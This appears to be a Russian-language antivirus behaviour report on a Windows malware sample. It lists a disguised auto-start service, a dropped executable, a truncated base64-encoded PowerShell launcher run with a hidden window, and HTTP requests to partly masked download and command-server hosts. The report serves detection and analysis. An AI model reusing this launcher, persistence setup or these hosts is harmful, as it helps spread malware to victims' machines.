Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\SortServer2003Compat] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\SortServer2003Compat] 'ImagePath' = '"%WINDIR%\SysWOW64\mscms\SortServer2003Compat.exe"'
Создает следующие сервисы
- 'SortServer2003Compat' "%WINDIR%\SysWOW64\mscms\SortServer2003Compat.exe"
- 'SortServer2003Compat' %WINDIR%\SysWOW64\mscms\SortServer2003Compat.exe
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABxAHUAdQBhAGYAeABlAGEAcgA9ACcAagB1AG0AagB1AGEAcABoAGUAdQBwACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAdQByAGAASQBUAHkAYABwAFIAbwB0AGAAbwBDAG...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\842.exe
Удаляет следующие файлы
- %WINDIR%\syswow64\mscms\sortserver2003compat.exe
Перемещает следующие файлы
- %HOMEPATH%\842.exe в %WINDIR%\syswow64\mscms\sortserver2003compat.exe
Сетевая активность
Подключается к
- '10#.#09.239.55':80
TCP
Запросы HTTP GET
- http://fa####e-kamenz.de/WordPress_01/yoAgOp3nqs1f6s46320/
- http://fa###mgl.com/cgi-bin/UVjmD8unt9339/
Запросы HTTP POST
- http://10#.#09.239.55/3ufBnJSYKfyZz/6FrCRs8OM79pHg3T/vN0rMV5kpYw/r7Uihyb5mrRfoe9U9F/PXQfAfv9LTfEzhvL2g3/RqPB6r9aiJWvcCR/
UDP
- DNS ASK fa####e-kamenz.de
- DNS ASK fa###mgl.com
Другое
Создает и запускает на исполнение
- '%HOMEPATH%\842.exe'
- '%WINDIR%\syswow64\mscms\sortserver2003compat.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABxAHUAdQBhAGYAeABlAGEAcgA9ACcAagB1AG0AagB1AGEAcABoAGUAdQBwACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAdQByAGAASQBUAHkAYABwAFIAbwB0AGAAbwBDAG...' (со скрытым окном)
